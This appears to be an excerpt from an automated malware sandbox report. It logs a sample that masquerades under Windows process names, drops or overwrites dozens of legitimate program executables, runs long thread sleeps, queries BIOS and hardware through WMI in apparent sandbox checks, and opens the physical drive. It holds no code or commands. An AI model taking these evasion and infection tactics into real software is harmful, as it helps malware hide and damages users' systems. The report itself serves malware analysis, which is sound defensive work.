Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\tHZIVhBi.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\VrnUzURu.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\iTuSlVGA.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\aViTseNl.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\MrGoJLyr.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\oVvrynel.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zpVYYBvm.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\wNNHBaEp.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\EcnWByLa.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\hctSEgaX.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\MIUEPsLM.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\PbyWKVQt.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\NfKwuYup.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\KyrFXOMt.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exe	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\giPBeHvH.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exe	Jump to dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zAChyMGX.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\SBxdsXQA.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXE	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\OtzUWFWF.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\cqPBhmEa.log	Jump to dropped file
Source: C:\Users\user\Desktop\SearchIndexer.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXE	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe TID: 2520	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8144	Thread sleep count: 1440 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9096	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8916	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8288	Thread sleep count: 1483 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9152	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8880	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7188	Thread sleep count: 3459 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9156	Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8320	Thread sleep count: 76 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8892	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8336	Thread sleep count: 1350 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9128	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8908	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7352	Thread sleep count: 1131 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9148	Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8872	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8340	Thread sleep count: 1213 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9044	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8676	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8416	Thread sleep count: 1234 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9144	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8848	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8456	Thread sleep count: 1561 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9124	Thread sleep time: -13835058055282155s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8832	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8440	Thread sleep count: 1254 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9064	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8856	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8448	Thread sleep count: 1228 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9104	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8900	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8444	Thread sleep count: 1334 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9072	Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8824	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8464	Thread sleep count: 1401 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9048	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8460	Thread sleep count: 1331 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9088	Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8816	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8420	Thread sleep count: 1201 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9160	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7908	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8492	Thread sleep count: 1440 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9164	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7916	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8864	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8556	Thread sleep count: 1320 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9132	Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8684	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8568	Thread sleep count: 1086 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9052	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8388	Thread sleep count: 1949 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9136	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8936	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe TID: 3452	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe TID: 2256	Thread sleep time: -29514790517935264s >= -30000s
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe TID: 2256	Thread sleep time: -600000s >= -30000s
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe TID: 2256	Thread sleep time: -45000s >= -30000s
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe TID: 8664	Thread sleep time: -10800000s >= -30000s
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe TID: 2476	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe TID: 8664	Thread sleep time: -300000s >= -30000s
Source: C:\Program Files (x86)\Windows NT\TableTextService\en-US\tAVtSoJGTaCxrZiXcJn.exe TID: 1720	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe TID: 3616	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe TID: 1404	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3916	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe TID: 7032	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe TID: 2944	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe TID: 1848	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe TID: 6156	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe TID: 6668	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Windows NT\TableTextService\en-US\tAVtSoJGTaCxrZiXcJn.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	File Volume queried: C:\ FullSizeInformation

